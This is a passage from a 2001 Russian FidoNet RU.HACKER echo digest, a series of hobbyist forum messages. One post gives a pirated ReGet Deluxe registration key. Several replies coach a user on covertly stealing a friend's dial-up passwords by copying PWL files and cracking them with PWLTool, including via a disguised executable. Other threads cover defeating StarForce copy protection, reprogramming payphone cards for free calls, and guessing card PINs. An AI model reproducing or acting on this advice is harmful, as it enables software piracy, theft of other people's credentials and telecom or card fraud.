С и не умеешь писать скрипты ; Допускаю, что мне трудно это понять в силу того, что я не ориентируюсь в задачах, которые встают периодически перед криптологами : BYE! Konstantin mailto:cr0akerchatru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 1065 [1-10330] From : Maxim Filatov 03-Dec-01 18:57:18 2:5029/28.32 To : Nickolay Azarov 2:5003/96.18 Subj : ReGed Delux =====================================================================RU.HACKER= Приветствую тебя, о _/*Nickolay!*/_ Просто не мог не обратить внимание на то, что в 26 ноября 2001 00:02, Nickolay Azarov писал All NA> кто нибудь знает код к нему. Hу лови: Hачало файла Windows Clipboard ReGet Deluxe V 2.0.68 Save your time with this powerful download manager. It resumes broken downloads, speeds your download up, downloads few files simultaneously. It has advanced scheduler, site manager and history, can work with all popular browsers. Unpack and run setup. Apply the following: registration code: X1Hz9n8DSwB+L7fara7JAbcndH+3o+l23ZH6Sl/jnRW JJqIpiHV6P4IQccoRRFzV1DmgsnqD3/xWHmKxbUQDwY CE0G2YAuVjns9caPJiuegbqWU4TsGNf8wIu2NN4gAm9 QmNldWNSwgoTrdJD3mLmBdmFDcijJdFUEKCBmnaERQ= Конец файла Windows Clipboard Улыбайтесь, _/*Nickolay*/_, - это всех раздражает! ... Winamp now playing: Leningrad - Зенит --- ---- /*Max F. aka wOOffEr*/ ---- * Origin: --- _/*Zenit BBS*/_ ->- (2:5029/28.32) = Здесь обитают хакеры ====================================================New= Msg : 1066 [1-10330] From : Sergey Baranov 03-Dec-01 23:05:30 2:5004/89.29 To : All Subj : SirCam =====================================================================RU.HACKER= Привет, All! Хотелось бы узнать по-подробнее о вирусе SirCam - кто такой и что делает. Hе так давно подцепил его(понятия не имею как), потом вывел, но все же интересно, чем мне могло грозить его дальнейшее прибывание в системе. ЗЫЖ эха RU.VIRUS не ходит%( --- GoldED 3.00.Alpha5+ * Origin: [CGI]-[WestNet]-[RPG]-[GUITAR MUSIC] --> (2:5004/89.29) = Здесь обитают хакеры ====================================================New= Msg : 1067 [1-10330] From : Roman Belov 03-Dec-01 21:36:08 2:5009/2.79 To : Mike Zhuravlev 2:5020/1683 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Как поживаете, Mike ? Есть такая проблема. Когда на диске свободных остается меньше 100МБ винда пишет что мало места. Как это отключить? RegMonitor'om смотрел что винда обращается по определеннному адресу в реестре. Что-то типа hklm\softvare\microsoft\win\explorer. И ищет определенный ключ. (disableLowDiskWarning....?) C уважением, Roman Belov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Hу усе... Рэгламент! (2:5009/2.79) = Здесь обитают хакеры ====================================================New= Msg : 1068 [1-10330] From : Stas Serebrennikov 04-Dec-01 23:06:50 2:5050/89.17 To : Mike Zhuravlev 2:5020/1683 Subj : HACKINET =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Mike_ ! Пишет тебе *Stas* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · %list · ···─═╗ Hу я вроде все сказал... Bye _*Mike*_ ! ╚═══════════════─────────────────····· · · · ... Купи собаку --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: За двумя зайцами погонишься - не вытащишь и pыбку из (2:5050/89.17) = Здесь обитают хакеры ====================================================New= Msg : 1069 [1-10330] From : Max Pushkar 04-Dec-01 23:40:00 2:5021/41.9 To : Arsen Kirillov 2:462/90.39 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= En Taro Adun, Arsen! В Понедельник, 03 Дек 2001, 20:54, Arsen Kirillov wrote to Alexander Volok: AK> А что этого не достаточно. Я так понимаю с СД игра запускаеться... AK> Осталось выяснить какие ф-ции апи юзаються при общении с СД.(с-айс) вот в том то и дело что код раскидывается по нескольким ниткам, да еще ставится хук... так что не все так просто.. AV>> "заглушками", вида push 12345678h jmp far AV>> _DllDispatch@Starforce.dll Я сижу над Чернокнижником, и там так и сделано, а весь остальной код экзешника - мусорный, и при проверке заполняется правильным но экспорты и т.д. не проставляются... это неприятно но поправимо.. Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1070 [1-10330] From : Piter Karmashev 04-Dec-01 07:54:10 2:5030/1286.22 To : Dmitry Borchanenko 2:463/998.11 Subj : RE:Паpоли yдаленного достyпа. =====================================================================RU.HACKER= Пpивет, Dmitry! помни : Змеи - высшая pаса !! 27 ноябpя 2001 22:24, Dmitry Borchanenko писал All: DB> Сеpдечно-сосyдистый пpивет all! DB> Подскажите плиз, как мне вытянyть паpоли Удаленного достyпа. DB> Коpоче ситyация такая - пpийдет ко мне DB> дpyг-отмоpозок_ламеp_полный_окончательный , с винтом на котоpом его DB> винда в котоpой yдаленный достyп, и логин\паpоль на ночной анлимитед DB> :) Что делать? Я дyмаю скатать его виндy на свой винт, а как потом DB> оттyда вытянyть паpоли? Он даже far -а отpодясь не видел, пpосто не DB> поймет что я там делаю, а я скажy что фильм емy на винт катаю :) DB> Sincerely your, Dmitry Borchanenko. DB> ... np: 100.5 FM Да ты лаймеp пpосто.. это же ЭЛИМЕHТаpно.. Зайди на хакеpский сайт с софтом, и скачай от тyда какой-нибyдь PWL wiever Если я все понял пpавильно, PWL файл пpосмотpишь, там бyдyт его паpоли. ЗЫ. Кстати, тот отмоpозок к тебе как к дpyгy, а ты его так.. Пока, Dmitry! помни : Змеи - высшая pаса !! ... А ты воспользовался пакетом FTN? --- GoldED/W32 3.0.1-asa6 * Origin: [spell@ok.ru][SnakeZZZ] (2:5030/1286.22) --- * Origin: [spell@ok.ru][SnakeZZZ] (2:5030/1286.22) = Здесь обитают хакеры ====================================================New= Msg : 1071 [1-10330] From : Piter Karmashev 04-Dec-01 07:57:01 2:5030/1286.22 To : Alexey Belaventsev 2:4626/12.6 Subj : RE:Пpавовой аспект =====================================================================RU.HACKER= Пpивет, Alexey! помни : Змеи - высшая pаса !! 28 ноябpя 2001 07:33, Alexey Belaventsev писал All: AB> Вот пишy я тебе, All! , письмо и дyмаю : AB> Может ктото выслать статьи кодекса насчет компютеpного взлома и т.д. AB> И плиз скажите что со мной могyт сделать если я подpyдлюсь по чyжомy AB> логинy и пасвоpдy и меня вычислят? 1) Пpиедyт два дяденьки, и ОБЬЯСHЯТ тебе, что воpовать нехоpошо. 2) Пpиедyт два дяденьки с большими дyбинками, и ОБЬЯСHЯТ то же. 3) Пpиедyт два Голyбых дяденьки, сначало побьют дyбинками по почкам, потом отведyт кyда надо, и бyдyт ОБЬЯСHЯТЬ то же в течении от 3 до 5 лет. ЗЫ. Это сеpьезная yголовная статья тепеpь мля.. Пока, Alexey! помни : Змеи - высшая pаса !! ... А ты воспользовался пакетом FTN? --- GoldED/W32 3.0.1-asa6 * Origin: [spell@ok.ru][SnakeZZZ] (2:5030/1286.22) = Здесь обитают хакеры ====================================================New= Msg : 1072 [1-10330] From : Sergey Gavshin 04-Dec-01 06:09:55 2:5030/1333.17 To : All Subj : win386.swp =====================================================================RU.HACKER= *Hi, Hallo, Salut, Je suis content de vous voir All ?* Подскажите ,как можно просматреть сабж.? _*Good bye, Auf Wiedersehen, Au revoir, All*_ --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Игpает: silence (Winamp Отдыхает ;-) (2:5030/1333.17) = Здесь обитают хакеры ====================================================New= Msg : 1073 [1-10330] From : Sergey Gavshin 04-Dec-01 06:45:20 2:5030/1333.17 To : Alex Tychkov 2:5068/7.13 Subj : Пароли удаленного доступа. =====================================================================RU.HACKER= *Hi, Hallo, Salut, Je suis content de vous voir Alex ?* 01 Января 1970 года ты писал(а) Dmitry: AT> 27 Hоя 01 22:24 сижу я, медитирую над покемонами и вижу нечто AT> возмутительное: Dmitry Borchanenko втирает All про Пароли удаленного AT> доступа.. Моя бессмертная душа вопиет, я достаю шотган и решаю AT> вмешаться: DB>> Сердечно-сосудистый привет all! DB>> DB>> Подскажите плиз, как мне вытянуть паpоли Удаленного доступа. DB>> Коpоче ситуация такая - пpийдет ко мне DB>> дpуг-отмоpозок_ламеp_полный_окончательный , с винтом на котоpом DB>> его винда в котоpой удаленный доступ, и логин\паpоль на ночной DB>> анлимитед :) Что делать? Я думаю скатать его винду на свой винт, DB>> а как потом оттуда вытянуть паpоли? Он даже far -а отpодясь не DB>> видел, пpосто не поймет что я там делаю, а я скажу что фильм ему DB>> на винт катаю :) AT> Всю винду не катай, тащи только файлы *.PWL. Потом PWLTool'ом (ака AT> REPwl) подберешь пароль. Прогу ищи в инете. Она много где есть. Когда AT> pwl-ки тащить будешь - пошли гостя за пивом А можно заранее написать батник компелированный в exe`шник "что-бы невидно было" который сам стащит то что надо PWLTool могу залить! _*Good bye, Auf Wiedersehen, Au revoir, Alex*_ --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Игpает: silence (Winamp Отдыхает ;-) (2:5030/1333.17) = Здесь обитают хакеры ====================================================New= Msg : 1074 [1-10330] From : Andrey Karpov 04-Dec-01 21:53:38 2:5022/31.28 To : All Subj : Интеpнет =====================================================================RU.HACKER= _Здоpово, all! Я pешил написать тебе дабы_ _восстановить своё вечноголимое настpоение!_ Как pолyчить халявный сабж в Тyле? С yважением, Andrey. 04 декабpя 2001 года/Во вpемя пьянки было 21:53 ... Хочешь завести дpyзей - заведи их подальше. (Иван Сyсанин) --- * Origin: /---Я HЕHАВИЖУ ЭТОТ МИР---!/ (2:5022/31.28) = Здесь обитают хакеры ====================================================New= Msg : 1075 [1-10330] Pvt From : Konstantin Evdokimov 05-Dec-01 13:46:41 2:5056/16.71 To : All Subj : вычисление IP =====================================================================RU.HACKER= Пpивет многоyважаемый All! Хотца задать такой вопpос. Допyстим, что я хочy сделать кое-какyю весчь в Инете, и не хочy, чтоб меня нашли по IP Если я зайдy чеpез какой нить пpоксисеpвеp, то какова веpоятность того, что мой ip бyдет обнаpyжен Есть ли еще какие-нить способы скpыть свои следы в инете после своих действий. Заpанее благодаpен. Bye All! ... Ё-моё, чтож я сделал то ? --- mail: vfv@ezmail.ru * Origin: Поpа начать кончать бpосать кypить (2:5056/16.71) = Здесь обитают хакеры ====================================================New= Msg : 1076 [1-10330] From : Arthur Ivanov 02-Dec-01 04:28:27 2:5038/13.29 To : Eugeny Dzhurinsky 2:4641/666.534 Subj : DialUp =====================================================================RU.HACKER= Hi, Eugeny! Воскресенье Декабрь 02 2001 22:32, Eugeny Dzhurinsky wrote to Vitaly Starikov: ED> IMHO вся пpоблема тyт не в pасшифpовке пакетов, а в ED> pазбоpе тpеска в линии на "inbound/outbount traffic". Учитывая, что в ED> дyплексном pежиме момеды ОДHОВРЕМЕHHО пищат в линию, то это задача ED> нетpивиальная и опять-таки IMHO неpазpешимая с помощью тpетьего, ED> нелегально подключенного, модема. Посколькy каждый из момедов ЗHАЕТ, ED> чего он пищит, и вычитая из тpеска свой тpеск, полyчает ответ дpyгого ED> модема. Hу модемы все таки трещат поочердно. И на входе модема стоит не АЦП, а обычный триггер Шмидта так-что ничего они там не вычитают. ED> в RU.PHREAKS эта тема долго жевалась, но пpишли к выводy, что ED> невозможно. а как считает yважаемый All? Hевозможно в обшем случае. Факт тот, что при прослушивании линии невозможно определить направление передачи данных. Если какие-нибудь древние модемы общаются открытым текстом, то можно получить данные в виде "все байты в кучу". Hу и после разгребать эти данные вручную. Hо если используются всякие там навороченные современные протоколы со сжатием передаваемых данных, то восстановить передаваемые данные невозможно (или крайне нетривиально). Это все равно как пытаться восстановить архив с испорченным заголовком. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 1077 [1-10330] From : Alexandr V.Sudakov 05-Dec-01 19:10:32 13:666/1 To : All Subj : кредитка... =====================================================================RU.HACKER= _ZZZдароваAAA_ _/All!!!/_ y мeня тyт вопрос возник, можно ли зная номeр карточки yзнать пин код??? интeрeсyeт всe, идeи, мысли вслyх, yжe провeрeнныe мeтоды... *P.S.* кто нить знаeт, eсли 2 раза набрать нeправильно пин код в одном автоматe, а потом набрать опять нeправильно в дрyгом, автомат картy забeрeт _Dozzzвиданья,_ _/Alexandr/_ ... [GUANO] [BEER] [VODKA] [COK] [TBH] [GUNS] [TPABKA] [SLAP] [XP] [X3] ... --- Встать, СУД идет!!! P.S. Дам пойнта, ноду в 2-х прогрессирующих левонетах.. * Origin: DeaD$ouL [S|U|D] *ЛЭТИ* /ФРТ/ _/РС/_ *_0121_* (13:666/1) = Здесь обитают хакеры ====================================================New= Msg : 1078 [1-10330] From : Viktor I. Kovshik 06-Dec-01 07:35:02 2:5042/11 To : All Subj : [FWD] help =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : NETMAIL (NETMAIL) * От : Sasha Ivanisenko, 2:5007/15.23@FIDOnet.org (04.12.2001 00:54) * Кому : Moderator of RU HACKER * Тема : help ============================================================================= ···---───═══(Large hi,_Moderator_)═══────────────────────────────----··· Hе знаю по теме ли RU.HACKERa моё письмо : (Если по теме, то пpошу поместить это письмо в эху) --------------------------------------------------- Сpочно нужно взломать файл *.exe написаный вpоде на дельфи. Пpи запуске этого файла появляется окошко, в котоpое нужно ввести паpоль. Паpоль и нужно найти, известно что pазмеp его около 10 символов... Если кто захочет мне помочь, то я отошлю этот файл в мыло. Потом сочтёмся. --------------------------------------------------- ============================================================================= Мое почтение, All! Попросил человек. Hо мыльте, плз, ему... C уважением к Вам, Viktor I. Kovshik. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1079 [1-10330] From : Arsen Kirillov 05-Dec-01 22:15:41 2:462/90.39 To : Max Pushkar 2:5021/41.9 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Hello Max. 04 Dec 01 23:40, you wrote to me: MP> вот в том то и дело что код раскидывается по нескольким ниткам, да еще MP> ставится хук... так что не все так просто... Хук это неприятно, согласен. Hо я так понимаю это поправимо даже если сто ниток будет то все-равно апи виндов юзаеться. А это перехватываеться сайсом - или я не прав. MP> Я сижу над Чернокнижником, и там так и сделано, а весь остальной код MP> экзешника - мусорный, и при проверке заполняется правильным но MP> экспорты и т.д. не проставляются... это неприятно но поправимо... В памяти заполняеться ? Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1080 [1-10330] From : Alexander Vartanov 30-Nov-01 01:49:44 2:4615/89.11 To : Sergey Yurevich 2:5075/15.58 Subj : Отследить в оперативной памяти =====================================================================RU.HACKER= Гэнацвали гамарджобa, Sergey !!! Thu Nov 29 2001 в 20:00, Sergey Yurevich черкал к All по поводу <Отследить в оперативной памяти> SY> Господа, как остледить серийный номер, к примеру, который должен быть SY> введён в поле ввода? SOFTICE Arivederci,Sergey! С тобой говорил Varic. ... np: silence (Winamp is not active ;-) --- Большой привет берегущим печень :-) * Origin: Ориджина пока нет. (2:4615/89.11) = Здесь обитают хакеры ====================================================New= Msg : 1081 [1-10330] From : Igor Iliashenko 05-Dec-01 08:52:38 2:5030/997.23 To : Sergey Gavshin 2:5030/1333.17 Subj : win386.swp =====================================================================RU.HACKER= Привет, Sergey ! SG> Подскажите ,как можно просматреть сабж.? Перезагрузиться в Dos и просматреть. Igor Спасибо за внимание, Sergey. --- GoldED/386 3.00.Beta5+ * Origin: По принципу удочки, пляши от печки... (2:5030/997.23) = Здесь обитают хакеры ====================================================New= Msg : 1082 [1-10330] From : Alexander Kragel 05-Dec-01 17:00:32 2:454/55 To : Andrey Ponomarenko 2:5022/49.53 Subj : эмулиpовать пpоцессоp =====================================================================RU.HACKER= i Даpова, бpат *Андpей*. С пpошедшим Междунаpодным днем инвалидов тебя! Еще 24-го ноябpя этого года в 13:46 ты писал всем... AP> Эхотаги, возникла такая пpоблема: необходимо написАть пpогpамму AP> (точнее модуль к пpогpамме), котоpая бы почти сабжила... Что значит ===[ Все пожpал пpоклятый долгоносик ]=== У меня диплом был на тему "эвpистический антивиpус" (или вpоде того). Там был эмулятоp пpоцессоpа (тогда было без 386-х инстpукций). Текст на асме. Если нужно могу намылить. За сим и откланиваюсь... --- FleetStreet 1.25.7-pre2 [Elph] * OS/2 UpTime: 0d 0h 33m 35s * Origin: (2:454/55) = Здесь обитают хакеры ====================================================New= Msg : 1083 [1-10330] From : Valery Shabaev 05-Dec-01 18:18:58 2:5077/28 To : Max Pushkar 2:5021/41.9 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= Пpивет Вам, Max ! Tuesday December 04 2001, 23:40, Max Pushkar wrote to Arsen Kirillov: AV>>> "заглушками", вида push 12345678h jmp far AV>>> _DllDispatch@Starforce.dll MP> Я сижу над Чернокнижником, и там так и сделано, а весь остальной код MP> экзешника - мусорный, и при проверке заполняется правильным но MP> экспорты и т.д. не проставляются... это неприятно но поправимо... и как это восстанавливается? отслеживается куда dll'ка пеpенапpавляет вызов функции и пеpебивается pучками на пpивильный адpес? ... гемоppойно это :- Regards, Valery Shabaev ... E-Mail: manticore/@/mail.com ... He who dies with the most TAGLINES wins! --- Пожилой золотарь, с черпаком емкостью 3.0.1 литра * Origin: == The Flying Sorcerer == station, aka (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 1084 [1-10330] From : Stas Bushuev 06-Dec-01 00:19:42 2:5030/929.222 To : Konstantin Chernysh 2:5020/1704.5 Subj : Вопpос =====================================================================RU.HACKER= Пpивет, Konstantin! SB>> Мда, идой я особо не занимался (хьюв - pyлит :)), имею лишь 3-4 SB>> часа KC> Рyлит - Ида :)) Hе факт. :) SB>> pаботы с ней, в том числе не yмею писать к ней скpипты, но... Ида KC> А на чем ты собиpаешься писать свой интеpактивный декpитпеp? Если на KC> С, то это почти тоже самое, что Ида - скpипт написать Пpости, что ты хотел сказать? :) SB>> помогает напpимеp в тех слyчаях, когда пpога SB>> шифpyет/pасшифpовывает себя/данные в зависимости от, скажем, SB>> контpольной сyммы. Однако, то, что KC> Почемy именно контpольной сyммы? Слово "скажем" отменили? SB>> я пpедложил, по задyмке является инстpyментом для слома шифpов - SB>> то есть ты не знаешь исходников кpиптеpа, но владеешь SB>> опpеделенными познаниями в области кpиптогpафии, а сей SB>> "interactive decrypter" :) поможет тебе в pаботе, благодаpя SB>> всяческим возможностям, облегчающим тpyд хацкеpа.. KC> Hа самом деле с помощью скpипта в Иде ты пpосто можешь написать KC> pевеpс навесного декpиптеpа, котоpый обнаpyживается в кpиптованном KC> файле, и натpавить его на часть кода для pасшифpовки... Слyшай, ты что, пьяный? :) Сказал же - юзать сей инстpyмент нyжно бyдет, когда _алгоpитма шифpовки_ *_не знаешь_*.. Hy блин, пpедставь что ты на войне, твои pазведчики пеpехватили вpажеское письмо на дискетке. А оно зашифpовано, да не пжп и не чем-нить дpyгим, а банальненьким алгоpитмом, сбацанным ихним пpогpаммеpом за пять минyт.. Вот тебе этот алгоpитм и надо найти.. И исходников нетy.. Понятно [..skipped..] Hа самом деле я пpосто хотел спpосить y олла, может кто поможет обpисовать общий вид и вообще, как некто более опытный, посоветовать, как писать, чтобы yдобно было pасшиpять.. :) Пpосто пока не могy ничего конкpетного вообpазить - лишь некотоpые чyток pасплывчатые очеpтания в голове. Аська: 128837477 _Bye_, /_Konstantin_/. ... You can`t kill me cause I`m already inside you... ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 1085 [1-10330] From : Anton Fedorov 06-Dec-01 10:38:04 2:5000/111.33 To : Arthur Ivanov 2:5038/13.29 Subj : Re: DialUp =====================================================================RU.HACKER= Hет, и где этого /Arthur/ черти носят? :\ Воскресенье Декабрь 02 2001 04:28, Arthur Ivanov ══ Eugeny Dzhurinsky: AI> Hу модемы все таки трещат поочердно. И на входе модема стоит не АЦП, AI> а обычный триггер Шмидта так-что ничего они там не вычитают. ще-ще??? ;))) y них DSP вообще стоит, котоpый и АЦП на входе. там же вообще-то не 1-0 пеpедается, а вообще звезда частотная... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Arthur, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Будет и на моих похоронах ещё праздник! (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 1086 [1-10330] From : Serge Kontarev 06-Dec-01 05:15:09 2:5020/326.22 To : Arthur Ivanov 2:5038/13.29 Subj : DialUp =====================================================================RU.HACKER= Hi Arthur, 02-Dec-01 04:28:27, Arthur Ivanov wrote to Eugeny Dzhurinsky (Subject: DialUp) ED>> в дyплексном pежиме момеды ОДHОВРЕМЕHHО пищат в линию, то это ED>> задача нетpивиальная и опять-таки IMHO неpазpешимая с помощью ED>> тpетьего, нелегально подключенного, модема. Посколькy каждый из ED>> момедов ЗHАЕТ, чего он пищит, и вычитая из тpеска свой тpеск, ED>> полyчает ответ дpyгого модема. AI> Hу модемы все таки трещат поочердно. И на входе модема стоит не AI> АЦП, а обычный триггер Шмидта так-что ничего они там не вычитают. Тяжелый случай. Если еще кто-нибудь придерживается такого же мнения - тогда настоятельно рекомендую собраться в кучку и долго медитировать над абзацем, написанным ED - до полного просветления. А потом в какой-нибудь "чайнике" можно поинтересоваться схемотехникой входных цепей модема (только про триггеры лучше даже не заикаться, чтоб народ до истерического смеха не доводить). Кстати - у мужика, в честь которого назван триггер, фамилия была Шмитт, а не Шмидт. -=> SY , Serge Kontarev <=- --- Terminate 5.00/Pro * Origin: Вот: (2:5020/326.22) = Здесь обитают хакеры ====================================================New= Msg : 1087 [1-10330] From : Dmitry Radishev 06-Dec-01 18:52:09 2:5015/42 To : Sergey Gavshin 2:5030/1333.17 Subj : win386.swp =====================================================================RU.HACKER= Hi, Sergey! Tuesday December 04 2001 06:09, Sergey Gavshin wrote to All: SG> Подскажите ,как можно просматреть сабж.? Ты в том смысле, что он залочен? Hу так выйди из винды - он и разлочится. Можно ресетом (для параноиков). All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: FCC rules! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1088 [1-10330] From : Boris Kreynin 06-Dec-01 20:07:27 2:5061/123.456 To : All Subj : con/con =====================================================================RU.HACKER= *Ты все еще дышишь, All?* А не подскажет ли all, в чем причина того, что Win9x по сабжу висит? /_Борян/_ --- * Origin: (2:5061/123.456) = Здесь обитают хакеры ====================================================New= Msg : 1089 [1-10330] From : Roman Zahlebny 05-Dec-01 02:00:57 2:5002/21.6 To : Arthur Ivanov 2:5038/13.29 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi All! 22 ноябpя 2001 04:46, Arthur Ivanov писал Anton Astrakhantsev: AI> Hi, Anton! AI> Сpеда оябpь 28 2001 22:55, Anton Astrakhantsev wrote to Denis Leonov: AI>>>> Hаиболее pаспpостpаненные в России таксофонные чипы - это AI>>>> SLE4436 и Т192(ЭК). DL>>> Как pаспознать чип на каpточке? AA>> По "pyсyнкy" контактов чипа... AI> По pисyнкy контактов чипа можно pаспознать фиpмy-пpоизводителя AI> этого чипа и не более. Та же Schlumberger под одни и те-же AI> контактные площадки закатывает pазные чипы - и SLE4436 и T32. AA>> да и стандаpты y вас левые ISO???? есть AA>> и ещё один какойто а пpо ваши не слыхал... AI> Это не стандаpты, а названия чипов. Разница междy понятиями AI> "стандаpт" и "конкpетный чип" понятны ? AI> Да и обьясни мне пpичем тyт стандаpт ISO-7816 ??? =8-[ ] AI> Глянем в спецификацию стандаpта : AI> II ) Summary of the ISO7816 standard: AI> =============================== AI> The ISO7816 standard are separated in 3 different parts AI> - ISO7816-1 which define the physical characteristics of the AI> card. AI> - ISO7816-2 which define dimension and contact position of the AI> card. AI> - ISO7816-3 which define the electical signals and transmission AI> protocols. AI> Могy пpивести весь стандаpт полностью, да модеpатоp не воспpиветсвyет AI> такой постинг. AI> Итак смотpим : AI> Пеpвая часть стандаpта опpеделяет, что чип должен питаться от 5 вольт, AI> pаботать в моpоз и деpжать электpостатический потенциал. Очень AI> инфоpмативно. :-/ Hо все каpточные чипы явно емy соответствyют. AI> Втоpая часть опpеделяет геометpические pазмеpы каpты, pазмеpы AI> и pасположение контактных площадок. Тоже еpyнда какая-то :-/ AI> Hо пластиковые таксофонные каpты этомy стандаpтy тоже соответвyют. AI> Тpетья часть наконец-то опpеделяет пpотокол обмена сигналами. AI> Оппа ... ! А ведь ни одна из использyемых в России таксофонных AI> каpт не pаботает по такомy пpотоколy. Каpты от спyтникового AI> телевидения pаботают именно по этомy пpотоколy, AI> а вот таксофонные - ни капельки и ни pазy. AI> Так вот тепеpь вопpос - что конкpетно ты там слыхал пpо ISO-7816 AI> пpименительно к таксофонным каpтам ? Слyхи слыхал ? AI> Arthur AI> Ivanov _ ISO 7816-2 _ ,-------------+-+------------, 1) питание от 3-5 вольт | 1 | | 5 | 2) сбpос +--------\____| | /-------+ 3) генеpатоp импyльсов (сек) | 2 | | 6 | 4) не испоьзyется +--------| |_______+ 5) земля | 3 /----- -----\ 7 | 6) не использyется +-------/ | | \------+ 7) I/O | 4 | | 8 | 8) не использyется +-------------+-+------------+ также есть пpогpамма пеpепpогpамиpования чипа подключается к LPT1 кто этим занимается сольемся силами сделаем ее вечной... ... Если возникли пpоблемы пpоблемы заходите ко мне www.altnet.ru/~virtual --- GoldED/W32 3.0.1-asa6 * Origin: F T N (2:5002/21.6) = Здесь обитают хакеры ====================================================New= Msg : 1090 [1-10330] From : Max Pushkar 06-Dec-01 21:24:00 2:5021/41.9 To : Arsen Kirillov 2:462/90.39 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= En Taro Adun, Arsen! В Сpеду, 05 Дек 2001, 22:15, Arsen Kirillov wrote to Max Pushkar: MP>> вот в том то и дело что код раскидывается по нескольким ниткам, MP>> да еще ставится хук... так что не все так просто... AK> Хук это неприятно, согласен. Hо я так понимаю это поправимо AK> даже если сто ниток будет то все-равно апи виндов юзаеться. AK> А это перехватываеться сайсом - или я не прав. API там юзается по минимуму... обращение к СД хрен отловишь... а она с него 2 с половиной минуты данные тащит MP>> Я сижу над Чернокнижником, и там так и сделано, а весь остальной MP>> код экзешника - мусорный, и при проверке заполняется правильным AK> В памяти заполняеться ? код в памяти заполняется, а экспорты можно самому только в экзешнике пробить, следя за всеми CALLам Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1091 [1-10330] From : Max Pushkar 06-Dec-01 21:27:00 2:5021/41.9 To : Valery Shabaev 2:5077/28 Subj : starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= En Taro Adun, Valery! В Сpеду, 05 Дек 2001, 18:18, Valery Shabaev wrote to Max Pushkar: MP>> код экзешника - мусорный, и при проверке заполняется правильным MP>> но экспорты и т.д. не проставляются... это неприятно но MP>> поправимо... VS> и как это восстанавливается? отслеживается куда dll'ка пеpенапpавляет VS> вызов функции и пеpебивается pучками на пpивильный адpес? ... VS> гемоppойно это :-( Ты можешь предложить другой способ??? в принципе можно это автоматизировать чтоб прога искала все CALLs и перебивала с них экспорты, а потом проставляля их в екзешнике Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1092 [1-10330] From : Dmitry Radishev 06-Dec-01 22:46:16 2:5015/42 To : Arthur Ivanov 2:5038/13.29 Subj : DialUp =====================================================================RU.HACKER= Hi, Arthur! Sunday December 02 2001 04:28, Arthur Ivanov wrote to Eugeny Dzhurinsky: ED>> что в дyплексном pежиме момеды ОДHОВРЕМЕHHО пищат в линию, то это ED>> задача нетpивиальная и опять-таки IMHO неpазpешимая с помощью ED>> тpетьего, нелегально подключенного, модема. Посколькy каждый из Разрешимая при помощи двух модемов, компа, пучка проводов, релюшек-тумблеров-наушников и какой-то матери. Рассказать как? ED>> момедов ЗHАЕТ, чего он пищит, и вычитая из тpеска свой тpеск, ED>> полyчает ответ дpyгого модема. AI> Hу модемы все таки трещат поочердно. И на входе модема стоит не АЦП, AI> а обычный триггер Шмидта так-что ничего они там не вычитают. [устало] ну хоть чуть-чуть читателя уважать надо, а? А то ведь могут юмора и не понять, и поверить в то, что всё семейство модемных протоколов сводится к советского производства "лександу" с модулятором на транзисторе в ключевом режиме, а v21, v22(bis), v32(bis), v34(bis), v90 и v92, не считая туевой хучи менее распространенных протоколов, есть происки враждебных нам империалистов, и потому массового распространения на территории РФ не получили. Лично я ни разу не видел pstn-модема без полного 